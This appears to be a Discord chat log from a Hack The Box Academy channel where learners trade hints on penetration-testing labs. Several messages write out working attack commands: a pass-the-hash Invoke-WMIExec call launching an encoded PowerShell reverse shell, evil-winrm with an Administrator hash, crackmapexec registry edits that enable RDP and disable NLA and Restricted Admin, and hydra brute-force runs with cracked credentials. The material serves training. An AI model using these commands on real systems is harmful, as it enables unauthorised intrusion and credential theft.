#modules
instead of the actual terminal interface it's passed through a separate interpreter
pty - pseudo tty
yes
it's not limited to just python3
yeah you can do it with other interpreters
it can be done with perl, ruby, and other languages
i tried that, but it didn't upgrade. But ok, i know what to do better. Talk to you tomorrow guys
i got the last flag. I took a cigarette break and did some google search and it worked
thanks guys for the help ❤️
python3 worked for me
ah then it's likely due to the fact there were no env variables initialized
which when you drop into a pty/tty it initiates them
but i learned something new, and corrected my approach.
hey locos. I am at the final exercise of file upload. Have identified most aspects of the vulnerability. The only thing I miss is where this is uploaded. I have been checking the script.js and the upload.php. In script.js we have many aspects of checking the file but it doesn't indicate how the uploaded files are named or where they are stored. I think the code of upload.php should be accessed to find this but i can't find a way to see that code. Any hints are welcome, thank you loads.
What in the module can be done to view files?
In password attack assessment do we need to use the pw-attacks resources
and is the assessment linked to previous exercises (like usernames) of the module
it seems that the txt flag doesn't really exist. trying to use a find command for txt files in a PHPBASH interactive shell and it doesn't find any. When i do ls -la on the first folder i am in I can see the files, but when going to cd / nothing is appearing
Yes, including the mutated password list
you can sometimes find it in early parts of rockyou
as well
but start small --> big
the assessment is not linked to the sections in terms of the usernames/passwords on them
oh, ok
I read that as needing resources, no user accounts/passwords are the same / linked together from other sections
I'm pretty sure that at some part in that module they ask you to use credentials you found like 2 or 3 sections before
I did it manually according to my notes
better php webshell rather than PHPBASH interactive?
I am doing it also manually i think
Yes, you needed to keep track, but the assessment does not follow other than the mutated list
that's for the sections themselves, the skills assessment is a separate environment
just a vanilla php web* shell
Could I pick someone's brain about AEN. I just got done doing the Initial Access but was wondering about the tool that you use for the initial shell. How was I supposed to figure that out? Because the walkthrough instantly goes to that tool but I don't get why.
many people do AEN blind
Yeah thats why I try to keep it vague
if you don't understand why a tool is used, then I suggest reviewing the module that would be relevant to that tool
as the module itself is the walkthrough
I am trying to figure out how I was supposed to come to that conclusion
well then maybe you aren't ready
¯\_(ツ)_/¯
examine all enumeration you've done
Oh for the assessment yeah
But how would you have come to that conclusion to use that tool?
thank you amigos for the hints. you are awesome
i haven't done the module myself, but i'm telling you: the reason a tool is used is because some part of your enumeration told you to use that tool
so if you don't have notes or something that would lead you to use a tool
Hello folks, i'm doing the password attacks module on the Pass the Hash (PtH) section, there is a question "Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt. " i have no clue of what i have to do, i even went to the solution but was unable to complete the challenge, what am i supposed to do more or less?
re-evaluate your notes and enumeration tactics
as many treat AEN as a mock exam, there's going to be a reluctance to assist
Keep things simple
Has anyone done the Exploiting Web Vulnerabilities in Thick-Client applications section in the Attacking Common Applications module? I just wondered if others found it incredibly difficult? Like I feel like this section assumes that I just know how to read JavaScript and seems to go a million miles an hour with decompiling tools that have never been introduced before? Just feels like a super rushed section in my opinion. did anyone else struggle or just me?
Amazing exercise. You need to combine 2 hacks to reach the goal
this is the most common take on that section
btw I'm still waiting for help, I'm lost af
What exactly have you done?
did you perform the steps outlined?
I followed the solution
Genuinely feel like my confidence just got destroyed lol. good to know its not just me then
from what you said you haven't tried anything or aren't giving enough info for us to help you
repeating the question isn't really helpful in determining where the error lies
have you tried switching to a different VPN
and trying the same steps again
Yes it is not an issue with the vpn
You will want to provide more detail, if anything is a spoiler like a username you can just use j* and anyone that has completed it will know what you mean
I don't understand what i am more or less supposed to do
i just remember doing the steps as shown in the section and it worked
based off of enumeration of the machine
the section itself details using PTH and shell catching ¯\_(ツ)_/¯
there are plenty of ways to get in. https://www.revshells.com/
and if you said you followed a guide it sounds like you didn't fully read the section
also; using anything other than the module or the provided walk-through if you're an annual sub is cheating
since the Password attacks module is tier 1
as stated by the section; you need to use the nc binary in C:\tools; then generate the revshell using the Powershell #3 64 option
"Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt. " So i went to the machine's ip, got a shell using evil-winrm with the Administrator hash and executed a command that allows me to rdp in using Julio's hash, and in Julio's rdp session opened powershell, imported the module Invoke-TheHash, opened another powershell in Julio's rdp session and started a nc listener, went to revshells.com and created a payload, and then went to the powershell where i had run the Invoke-TheHash module and ran "Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command "powershell -e PAYLOAD" and nothing happens. Am i missing something?
do you have the revshell payload set to that machine's proper interface to connect to
Hope that this isn't confusing
also you don't need to continually repeat the question
Ok sorry
the ip you should be using for the reverse shell should be a 172.16.x.x ip
not the 10.129.x.x ip
AH here is the kicker uh
also redact the hash as it's part of the section questions
you're trying to tell DC01 to connect to an interface it doesn't have
if you tried to have it connect to the 10.129.x.x
(basic networking)
Okay sorry
I believe that if i read the thing right i would be able to do that right?
ipconfig should give you the interfaces
So lemme understand, this is an active directory lab right?
when i tell it to spawn the target, it spawns a AD setup
And the ip address 10.129.34.105 (the one that is spawned) there is multiple instances inside it
Okay got it
that aren't directly accessible via the tun interface
Now i understand
I'm still confused tho, why can't i just use the rdp session that i got as the Julio user and read the file in C:\julio\julio.txt
because
different machine entirely
MS01 != DC01
the machine you rdp into is MS01
they want you to create a connection to DC01
Wait, so if I can rdp as Admin i would be able to see the julio.txt flag
So this question is for us to learn how to get a shell on the domain controller as one of the domain users
no
the point and layout
your attack machine --> MS01; which has multiple interfaces --> DC01; which only has one interface for MS01 to connect with
yes
RDP could be disabled on DC01
@urban fable we're somewhat beyond that point, and trying to get at the underlying learning
the learning portion is grabbing a shell on DC01
Alright, now it makes sense. ill take a break and then i will try again with this new understanding. Thank you very much, your knowledge is on point. Lots of admiration for you.
basic networking goes a long way ¯\_(ツ)_/¯
and understanding that the interface you connect to DC01 with, isn't the same that you connect to the target with
what an amazing link is this
would you be surprised that several modules link to this very site?
almost like it's a much easier way to get revshells than manually remembering and writing out every single syntax
Yes this is advance notes on the go
<@&861185840277487616>
Very good question. But I dont think somebody will understand the purpose of your question
LMFAO
bro
@dim wolf did you catch the split second?
yea that was funny af
god i love skids sometimes
ftp ip
enter username: anonymous
please enter your email as password: [enter]
No new module today? 
They can only work so fast
Yep, was expecting a red team cert or a new windows / ad today, no problem
I would expect some time in Oct for it
plenty to eat from
Finished all the ad modules lol
Would you believe if I said that I have one?
Every attack on academy I replicate on my lab
Good idea, maybe after an O$CP
how do you do that :D?
you install the same setup ?
nope, I have 64gb RAM and 2tb ssd for my lab, I have 3 dcs and 3 workstations, of course I just spin up the machines that I need for a specific attack, let's say, spn hijacking which was not part of my lab, I read the attack on htb, check some posts about the attack and make the domain vulnerable to the attack
Nice
Sometimes the server connection is so buggy that SSH just becomes unresponsive every like 30 seconds, is it just me? It's a bit annoying to do a lab like that lol
question on the shells and payloads. my browser in the rdp session keeps resetting when i upload a war file on the tomcat site, and the zip on the status page. the page works as it should when i upload the wrong file, i get a wrong file error, but resets when i upload the one it asks for. following the hacktricks manual from rce down the list. just need a nudge and not sure why i got the browser reset error.
change the vpn region
could be as simple as that
change vpn region, reset target, try again
also don't need hacktricks rce
the module provides an msfvenom revshell payload
(it's in the cheatsheet, you'll just need to adjust the IP/PORT
for LHOST/LPORT
Hey, can you give me some help with this module also? I know what the password is and I've been testing why my methods to brute force were not working but can't figure out why, the Task specifies something about anti-CSRF and modifying my script to send such a token, but I don't see this token either
nvm it just spawned. weird
Broken Auth?
Yeah
Section? Bruteforcing Passwords?
Yep
||You have to find out the password rules and then filter the password list accordingly||
||I've found it, made the list shorter, and I know the password, confirmed it visiting the site, but wanted to know why ffuf or wfuzz both didn't work to find the password, they both gave the same response as the wrong ones but I don't know why ||
send the passwords (any password) in the browser and see what happens
Then you know why the tools don't work
this was the solution. thank you, i got it. really was that simple...
||I'm stuck in password cracking, password mutation , with sam help ?||
Don't attack ssh
||I scan the ports.. so I have 21, 22, 139/445. I tried with ftp scan, ssh scan, smb scan, winrm scan (both with nxc). I'm using the custom.rule and generating the password with "password" word. damn.||
I don't get it, I get invalid credentials when wrong and ||welcome|| when right, like the other questions with ||wfuzz the --hs 'Welcome'|| worked, I don't understand why it doesn't at this one
Mutate the provided password list with the provided custom.rule
The mutated wordlist should be 94k words
I'll try that, ty
This is the direct instruction told to you by the section
send me a dm
You don't gotta spoiler your whole text dude and don't use that word even "masked"
The fact you masked it means you understand it's a negative word
Hi, I am on Windows Privilege Escalation Skills Assessment - Part II. I am trying to exploit CVE-2020-0668. I have executed CVE-2020-0668.exe with a successful output (exactly the same as in the module kernel exploit). But I still cannot get permission to write the maintenanceservice.exe. Can anyone give me some hints?
The Windows Fundamentals course shows deprecated wmic
Just seems not productive to learn deprecated things
Won't work on Arm devices
Hello all. I am working on sql injection fundamentals, and I am stuck on the subverting query logic section. I was able to successfully login with the username and using injection on the password, but I am not seeing any flag. It just says I have logged in successfully and there is a link to try again which just resets the login page.
I thought the flag would show when i got the successful login, but no luck. Any hints on what I am missing?
I just found that even the output is normal, but the CVE wasn't copying the file. It's a liar 
nevermind. I was overthinking it.
You'd be surprised how many devices still run "deprecated" hardware/OS
I finally managed to exploit another vulnerability, but I am still curious about why the CVE-2020-0668.exe lied
<@&861185840277487616>
Seems like some clever work around of the filter
Since both those words should be banned and autoremoved
turns out im not as prepared as i thought i was for the aen, time to hit the books again
(compromised the domain)
in Stack-Based Buffer Overflows on Linux x86 : Having a very difficult time understanding this. Are there any suggestions?
I watched a lot of videos about computer architecture and assembly language, but I did not understand the topic well. It takes a lot of time
```nasm
section .data
num DD 5            ; a 32-bit (DD = define doubleword) value, 5

section .text
global _start
_start:
    MOV eax,1       ; system call number 1 = sys_exit on 32-bit Linux
    MOV ebx,[num]   ; first syscall argument (ebx): the exit status, loaded from num
    INT 80h         ; trap into the kernel; the process exits with status 5
```
I was inspired to write this simple program, but I don't really know what it does. I just memorize the code
What if you change some things?
```nasm
section .data
num DD 5

section .text
global _start
_start:
    MOV ebx,1       ; eax is never set here, so the syscall number is whatever eax holds at entry
    MOV ecx,[num]   ; ecx (second syscall argument) gets 5; ebx (first argument) is 1
    INT 80h         ; trap into the kernel with those registers
```
The code will work without any error
guyssssssssssssssss vpn academy is lagginggggggg what i do
anyy helpppp please im done
What do you not understand?
change vpn to a eu server
ebx if I changed to edx in the code Nothing happened
And when I used gdb
General registers
As the title says, general registers are the ones we use most of the time. Most of the instructions operate on these registers. They all can be broken down into 16 and 8 bit registers.
32 bits : EAX EBX ECX EDX
16 bits : AX BX CX DX
8 bits : AH AL BH BL CH CL DH DL
Just another register of the same type and the same size.
Change it to bx and see what happens.
gdb where?
Instead of DD?
Thank you, I understand now
What is the best source for learning assembly language?
What do you advise me to study before assembly language?
It doesn't matter, I understood what I needed thx
x86?
Yeah
ARM is more timely.
Send me a DM and when I get home I'll send you my bookmarks.
But yes, assembly is the most important language to know as a hacker, in my opinion.
Should I start with it or 64
It's underneath everything, and no one ever bothers to look at it
x86, in my opinion.
Okay bro thx
pwnable.kr is a good place for assembly CTFs.
In terms of learning assembly, I'd suggest learning RE.
Nice
Thx
Sure, I have more stuff on my laptop. Add me and ping me in a couple hours.
I need some help with Question - Connect via RDP with the Administrator account and submit the flag.txt as your answer. in the module ATTACKING COMMON SERVICES - attacking RDP. added the disabled reg key and try to login and get logon failures.
Are you using TCP or UDP VPN?
Okay done
Sweet. Yeah assembly is amazing. You have good instincts.
thx
Yep.
UDP
Use tcp
okay will do..ty.
If that doesn't work, come back
Hi everyone. I'm in Windows Attacks and Defense, Object ACLs module. I've set a new SPN and also changed password for anni's account, but there is no Security event 4738 (User account was changed). Why might this be?
Edit: I've resolved this now. I was viewing security event logs on the local machine (WS001), but instead needed to view them on DC1 (I RDP'd there with htb-student credentials mentioned in the kerberoasting sub-module). I believe this is because the DC processes all changes to AD objects (e.g. accounts).
I am back...I still get - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server, when trying to login with pth for RDP.
Did you put the disabled reg key in the right place?
Screen !!!!
Hey! Having some issues on the FFUF module, specifically the section about sub-domains. ||I don't get any sub-domains at all from inlanefreight.com. I've tried with both Pwnbox and my own Parrot VM. I've also tried with Gobuster to check if it was an issue with my FFUF command. I basically tried copy-pasting the command used as an example in that very same section: (ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.com/) and I get no result. With Gobuster the only domain found was www.inlanefreight.com, but that was with a different wordlist||. Did Inlanefreight change since this module was written?
This module btw: ||https://academy.hackthebox.com/module/54/section/488||
try with FUZZ instead of lowercase
I think Discord converted it to lower when it detected it as a URL. It's uppercase in my clipboard
I just tested myself and got the answer within 10 seconds. Are you running this command on the pwnbox or a vm?
I've tried both. On Pwnbox I did notice that every time I run ffuf on inlanefreight I start getting timeouts afterwards if I try access it through firefox, so I guess pwnbox is no good. I read somewhere in this channel that it would be caused by pwnbox's Internet traffic limitations.
On my VM (Parrot) The wordlists are a bit different, so I wonder if maybe that's a relevant difference. I've been trying with ||/usr/share/wordlists/dnsmap.txt||. I think that was preinstalled(?)
so you didn't actually use the command you just showed?
From pwnbox I did
try it from your vm
use subdomains-top1million-5000.txt
just like the module shows
Yeah will do, just gotta grab the SecLists. Don't think they're preinstalled on Parrot 
there are multiple versions of parrotos. the regular one comes with no security tools at all.
looks like the security version also doesn't include seclists
Not in /opt/useful/ like on pwnbox at least. And not in /usr/share or /usr/share/wordlist either
Afaik these are all I had by default
Parrot
S
Yeah my VMware was lagging when I was running Kali sadly
So Parrot it is
Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
I love the way Parrot looks, but it's not reliable yet.
@cloud urchin is this the right directory?
That's the registry key that configures the RestrictedAdmin setting
Thanks! It worked within seconds now
Didn't think the two wordlists would make that huge difference
Both aimed at subdomains after all 
Where's he screwing up? Did he forget to delete the old one?
FFuF... You climbing CPTS mountain?
True.
What command are you using to connect with rdp
Haha nah just hobby, and really just a beginner. Just trying to do some bit of Academy every week to keep learning
Welcome to the party.
Do the CPTS. I promise you'll have fun... That or get obsessed with popping boxes
xfreerdp /v:10.129.220.125 /u:administrator /pth:xxxxxxxxx /cert-ignore
what module
Add /dynamic-resolution
It won't fix your connection, but it's awesome.
Attacking RDP - Attacking Common services
okay, SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
logon failure usually means the creds are wrong, make sure you have entered the right ones
ok yeah, the module goes over this reg key specifically actually
reg key should be good, maybe its the hash
Can he post the hash?
Also
He might have grabbed the wrong part of it.
pth:30
Yeah that doesn't look right
You grabbed the hash from the file on the desktop?
It looks like you just copy/pasted the example command
Hi - having some trouble with Footprinting lab (easy) and it looks like maybe the writeup details are possibly inaccurate
module doesn't really cover it and I've run all this stuff on some boxes which does enable rdp, but i think sometimes the boxes have some auto-logoff script because sometimes it'll connect then boot me out.
```
CME module:
sudo crackmapexec smb <ip> -u user -p password -M rdp -o ACTION=enable
Disable RestrictedAdmin (allows admins to remote in):
sudo crackmapexec smb <ip> -u user -p password -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'
Enable RDP from CMD:
sudo crackmapexec smb <ip> -u user -p password -x 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
Disable NLA:
sudo crackmapexec smb <ip> -u user -p password -x 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f'
Allows remote administrative traffic through the Windows Firewall:
netsh firewall set service remoteadmin enable
Allows Remote Desktop traffic through the Windows Firewall:
netsh firewall set service remotedesktop enable
```
Nah writeup isn't inaccurate, tbh it's just that ||DNS|| isn't required
His error is wrong hash
for the step i'm on, the writeup says to check the lab HINT for the answer (which isn't there)
There's an explicit hash given in the special document on the desktop of htb-student
pth:0E
What step are you on?
Did you try it and see, or are you asking me
I've enumerated and know the internal host I'm supposed to connect to, but there is no indication as to how you are supposed to find the user and creds to login with
@fathom pendant
OHHHHH
I am closer now...now I see registry key is problem, no longer login issue.....I got the flag...thank you.
I know exactly what you're referring to
The creds used to be in the hint
Then they gave it explicitly in the readout for the assessment
ceil
I am good now, I get denied but I see splash page now that says login restricted so I will look at my registry keys..thank you.
Gotta log in via win-rm to be able to remove it and have the right privs too
Good shout @gusty zinc
: ) Presumably needs updating I assume? If a user doesn't have the paid sub they'd be hard pressed to get in without brute forcing
no they wouldn't
read the lab intro
Additionally our teammates...
ah shoot you're right
reading the synopsis of the engagement helps
it also helps identify keywords that might otherwise get you stuck
thank you nonetheless
no problem
and I submitted to #1234357888114364508 as it's still an error in the Walkthrough
Nice
it's likely that a bulk of the walkthroughs were written prior to some updates
because the hint change has been out there for like.... at least half a year now
if not longer
I remember being in the same boat when it was the harder version
like "how was i supposed to figure this out" and revisiting once I learned techniques from a later module
How do I scan a network quietly? NMap is too loud.
nmap lol. just different settings
another general tip;
always look for everything, enumeration is a cyclical process
I'm wracking my brains trying to workout where I'm going wrong with Burpsuite in the "Using Web Proxies" module. Everything seems fine with configuring foxyproxy and setting up the portswigger CA in firefox but then it seems like I'm doing something with trying to get it forwarding the right way once I have interception turned on. I've noticed that Burpsuite's chromium browser doesn't seem to change and I'm not sure if it's meant to navigate to the ip and port if that makes any sense.
I've tried doing the ip=;ls; command but whatever it's doing, it isn't giving me the lists of .txt documents it should be. Apologies if I'm being quite vague I'm just having a hard time putting my finger on whats going wrong.
Could I get some assistance with ACTIVE DIRECTORY ENUMERATION & ATTACKS - Living Off the Land please?
For the last question
Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.
I was able to get the answer with
||dsquery * -filter "(adminCount=1)" -attr sAMAccountName description|| however that just gave me a list of all admins & their description, thus giving me the flag. How am I supposed to find the answer properly? There's nothing in my solution that specifically finds a disabled account and my attempts to use combined filters have all failed.
there are many different ways to do it
the module provides a link to wmic queries which i believe you can also use
well, attempting it with the hint would mean using dsquery and ldap
i guess it also talks about it itself in the module
I can easily get a list of disabled users, I can get a list of admins, I'm struggling with getting a list of disabled admins
it gives net commands too
did you try ((&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2)(memberOf=cn=Administrators,cn=Builtin,dc=yourdomain,dc=com)))
returns nothing
I tried a number of queries that individually both worked, but when combined they would give nothing
did you modify the dn etc
maybe remove the category too
(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2)(memberOf=cn=Administrators,cn=Builtin,dc=yourdomain,dc=com))
Okay, I completely went back & made it as simple as I possibly could and got ||dsquery * -filter "(&(userAccountControl:1.2.840.113556.1.4.803:=2)(admincount=1))" -attr sAMAccountName description|| that finally gave me the correct output.
ez
I feel as though I tried that already, but I must have had a typo somewhere or something. Ty for the input
I spent way too much time trying to find a flag I already found... lol
you say that like it's a bad thing. you're learning new stuff and knowing how/why it works is really important. i spend time on modules i've done like that too.
Yeah, if I wanted to finish this quickly, I could. I'm trying to actually learn and understand everything, as finishing the path isn't the goal. Gaining the skills and knowledge is.
Anyone have a workaround for the Windows Privilege Escalation Module's Windows Built-in Groups section, specifically this portion?
I covered the issue with the target environment in erratum just now, but I wanted to see if anyone has found a way to complete this technique with a workaround.
Already got the flag and reported it, so if not, I guess it's not a huge deal for now, just frustrating that I can't practice all of the methods.
is there anyone who completed this module i need help with it in the skills assessment area "Login Brute Forcing" https://academy.hackthebox.com/module/57/section/515
what do you need help with
i need help in bruteforcing to the login panel
go on
i got through the first one and i'm stuck in the second panel
this is the code i used
but i keep on gettin random passwords
this is the skills assesment
anyone else had their academy progress reset after that SSO migration?
you should contact support team
yeah I am. just wondering if anyone else experienced that
Hello team
i have a problem with the openvpn config.
i can get an answer from the target.
it's from a wsl ubuntu config
what module
linux fonda
when i do it from the same openvpn config but with my laptop kali i dont get this problem
only from the wsl
yeah wsl kinda sucks
INTRODUCTION TO WINDOWS EVASION TECHNIQUES / Introduction, the credentials given to connect to the windows host seems not to work.
which section
works for me
yeah works now
let me guess quotes around the password
no...i used the normal xfreerdp /v:<target IP address> /u:<username> /p:<password>, which does not work, but this given in the module works: xfreerdp /v:[IP] /u:[USERNAME] /p:'[PASSWORD]' /dynamic-resolution /drive:linux,/tmp
yeah quotes lol
no
the first command that doesn't work doesn't have quotes around the password, the second one does
it's the quotes
For attacking authentication mechanisms under SAML signature wrapping attacks, after i remove ds:signature node, i keep getting a Invalid SAML Response. Not Authenticated error. any help
It is the quotes.
ah wrong quotes...
dynamic resolution just gives you exactly that, dynamic resolution, and the drive argument shares a folder path
you probably used double quotes instead of single
but double quotes also work sometimes no?
If you have special characters like !? In the password its best to use single quotes
i think it depends on the characters inside them
Literal strings
alright. my bad. you were totally right. But I really think that I've never had any problems with double quotes so far...
if u wanna continue with double you'd have to escape them manually
password\!\!\?
yeah probably because of the password, if it didn't have $ and ! double quotes would probably work
Hello, I am stuck on Login Bruteforcing, skills assessment, website part, question 2. everytime I bruteforce the password, it gives me a different answer, I am unable to login to the admin panel
You should probably delete that pic just in case, but you need to ensure you've enumerated what you're attacking correctly
uh, I am sure about the username, its from the previous question.
my issue is that its giving me a positive for multiple passwords, none of which work.
what is that "clear" at the end of the command?
You have not enumerated correctly because your command is off
uh wait
typo I guess because I cleared the outputs from before.
I see. I have removed the clear and it still doesnt seem to work. let me try a couple times
cause you need to "enumerate" better, did you check all the parameters? Are they correct?
Bump
I think I see my mistake now. Looks like I hadnt understood clearly what you or the module meant by enumerating parameters. let me see if it works. thanks
thanks. it worked. I have understood what I did wrong.
When using ffuf for subdomain enumeration, all results return with 403 Forbidden?
No, not necessarily. Depends on the webserver / web application you're enumerating.
Sorry, I meant against my own setup. Why does it return 403 forbidden?
Because you configured it like that? Considering it's your own setup π
Is it default? When i try to access it inside a web browser it just says not found but when using ffuf it returns all results with 403
That's impossible to answer without knowing what you are using and how you've configured it.
Oh okay, no worries. Wondered if it was something I was doing wrong with ffuf
I'll deep dive into the config
Hello i'm doing the password attacks module on the pass the hash section
We don't have access to the domain controller, and if you try to rdp into the target using the hash it logs you out.
So you need to get a winrm session , execute a command that allows you to use rdp using the hash
My question is, if we don't have access to the domain controller, how can we get a winrm session using "evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453" and execute "c:\tools> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f" (to be able to login in xfreerdp using the hash) and that actually changes something?
Didn't we have to execute that on the domain controller?
As far as i know we are executing the command to set "DisableRestrictedAdmin" to 0 to allow us to login via rdp using the hash, but since we don't have access to the domain controller how is that possible?
I had same problem, I managed to complete it on PwnBox instead of VirtualBox.
For attacking authentication mechanisms under SAML signature wrapping attacks, after i remove the ds:signature node and inject my assertion node, i keep getting an "Invalid SAML Response. Not Authenticated" error. any help?
This is a setting for the client you want to connect to and not a "global" setting.
But i execute the command to allow using the hash to login with rdp as the administrator user not julio
Not running kali bare metal? what a script kiddie
So what? If julio had the access rights to modify that key, you could set it with julio as well
But i set it as the administrator user not julio
Isn't julio only a domain under the domain controller? How can it be that I set the command that allows you to access rdp using the hash as the Administrator user on a different domain?
No... julio is not a domain. That's beside the point anyway...
If you want to RDP into the target with the (local) administrator hash, you have to set the key. The domain is not relevant for this part.
hello, i got a problem with the login brute force module, i'm in the last section. Hydra takes too much time or doesn't work, can someone help me?
More details please
So i had a similar problem
My computer is trash, so i used pwnbox
and if pwnbox takes too much time too, even tho you used the right command
i use pwnbox too, wait, i'll find you the command that i used
it was taking too long for me too
what i did is that i clicked on the solution and skiped waiting
also if you check the solution and you indeed put the right command and it was just a matter of waiting that isn't REALLY cheating
The solution also tells you if you are indeed using the right command, skipping a lot of frustration
Look tell me what you think, a lot of hacking by yourself is this grind of constant frustration and persistence
i'm working as a junior pentester, i have a mentor, the mentor teaches me the concept, and if you understand the concept because your mentor helped you out it skips a lot of the grinding and gets you the same learning experience
You can use the solution as your mentor, as long as you understand the concept it isn't really cheating
there might be the argument that you did not have to research the exact commands, but i believe that commands and other details will always change, but if you understand the concepts you are fine.
So that's my philosophical argument that if you check the solution it isn't really cheating as long as you understand the concept
If you just copy paste the answer, yeah that's cheating because you learnt nothing
That's why it's so good having a mentor
i would love too, but my mentor is working (he is a pentester too)
where can i find the solution?
low-key jealous you guys are both working in the field
Right beside the submit button
On the right of the hint button
It will pop open a window with the walkthrough
there
But don't worry you can use the solution to be kind of your mentor
idk why i dont have it
Do you have adblock?
it's only available if you have the Gold or Silver annual plan.
Sheeeeeeesh
sheeeesh
Okay but lemme help you, tell me the exact thing you need the answer for and ill tell you
Hi everyone, I was going through the Network Enumeration with Nmap module, and read a line that says:
"By default, Nmap scans the top 1000 TCP ports with the SYN scan (-sS). This SYN scan is set only to default when we run it as root because of the socket permissions required to create raw TCP packets. Otherwise, the TCP scan (-sT) is performed by default. "
I decided to confirm it using chatgpt and it said this line is incorrect...
can someone tell me what's right?
the last section, and the first question (i need the password to connect in ssh too)
To an extent I agree with this, so long as you try without a solution beforehand. If you immediately skip to the solution and then try to "learn" or reverse-engineer the solution for the sake of learning, I think you're still cheating yourself by skipping the chance to practice exploration. Besides, problems don't necessarily have only one solution.
In the table of contents, which one
skills assessments- Service login (login brute force module)
easy, medium, hard?
You can observe in wireshark the traffic captured from sudo nmap will never have a complete tcp handshake (SYN scan)
And if you tried to -sS without sudo it will complain
Nmap: A network scanning tool used to discover hosts and services on a computer network.
SYN scan (-sS): A type of port scanning technique that sends SYN packets to a target to determine the status of ports (open, closed, or filtered). It is efficient and stealthy but requires root privileges to send raw packets.
TCP connect scan (-sT): A port scanning technique that uses the operating system's network functions to establish a full TCP connection with each target port. This scan does not require root privileges but is less stealthy and slower compared to SYN scans.
Root: The highest level of access in a Unix-like operating system, providing unrestricted access to all commands and files.
Socket permissions: Security settings that control the ability to create and use network sockets, which are endpoints for sending and receiving data across a network.
In essence, Nmap's default behavior for scanning ports depends on the user's access level: root users perform a more efficient SYN scan, while non-root users perform a TCP connect scan.
you did this command right? "hydra -L Password-Attacks/username.list -P Password-Attacks/password.list ftp://STMIP -t 40 -f -u"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-20 02:24:17
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 40 tasks per 1 server, overall 40 tasks, 21112 login tries (l:104/p:203), ~528 tries per task
[DATA] attacking ftp://10.129.50.229:21/
[STATUS] 724.00 tries/min, 724 tries in 00:01h, 20388 to do in 00:29h, 40 active
<SNIP>
[21][ftp] host: 10.129.50.229 login: mike password: 7777777
<SNIP>
this is the output of the hydra command
no i did hydra -L user.txt -P harry.txt -u -f ssh://SERVER_IP:PORT -t 64
waddip nerds
Did you use the username and password list provided by the module?
Oh wait
yeah harry and harry.txt
you trying to brute force ssh
brute force ftp bro
ssh is impossible to brute force
fr?
I mean, it is possible, it just takes a reaaaaaaly long tine
time
ftp is much faster and they're using the same password on ftp for ssh
thanks for the tips
That is very true
Module: Attacking Common Services - Attacking FTP
What username is available for the FTP server?
|| I accessed the FTP service on port TCP/2121 using the anonymous login. I then downloaded the `users.list` file and `passwords.list` file to my attack host from the FTP server. To answer the question, I tried inputting all 11 usernames until I got the answer, which I did. ||
However, I know this can't be the right way to validate which username is available for the FTP service, so what is the right way?
you needed to bruteforce one of the services with the wordlists (ssh, i think).
I've already attempted to brute force the FTP service running on the target using the users.list and passwords.list files I got. It didn't find any credentials that work.
What I'm trying to find is how I can validate the username for the FTP service.
Did you scan the full range of ports?
Not yet, will do.
Anyhow try to bruteforce one more time the FTP server with the wordlists you got
So brute forcing would be the only method of validating the username that works for the FTP service?
I just noticed this module has a username list and password list under resources, so I'm trying to brute force with that this time.
I have used the one found in the FTP
Didn't work for me.
can you hide the screenshot and mark it as a spoiler? Try without using threads
Okay.
Let me know how it goes otherwise dm me
From HTB Academy: Footprinting > DNS > Footprinting the Service:
This is because if there are other DNS servers, we can also use them and query the records. However, other DNS servers may be configured differently and, in addition, may be permanent for other zones.
https://academy.hackthebox.com/module/112/section/1069
Does this mean to say pertinent for other zones? I'm not familiar with this and could not find any information about what it means for a DNS server to be permanent for a zone.
Bypassing Basic Authentication after changing the request method to HEAD, still getting the login form. Can someone help?
did you change this only to HEAD?
you can submit to #1234357888114364508 if you think it's a typo, if it gets fixed it does, otherwise you might get more clarity ¯\_(ツ)_/¯
Exactly what I was just looking for, a way of offering feedback. Thanks!
I've tried several methods, like switching GET to HEAD, and using Burp functions to change GET requests to POST and then to HEAD, but nothing seems to work.
See if there is anything else you are missing by looking at the available HTTP verbs
My b, thought only the HEAD method would work for that
thanks mate
np
Hello. I am working on the module "Pivoting, Tunneling, and Port Forwarding" and I am at the section "Dynamic Port Forwarding with SSH and SOCKS Tunneling".
I tried to perform an nmap scan using dynamic port forwarding but it seems that nothing is routed to the target machine.
I started by enabling port forwarding using SSH:
```
$ssh -D 9050 ubuntu@10.129.202.64
```
Then, I checked that my proxychains configuration is correct:
```
socks4 127.0.0.1 9050
```
Finally, I ran my nmap command through proxychains:
```
$proxychains nmap -v -Pn -sT 172.16.5.19
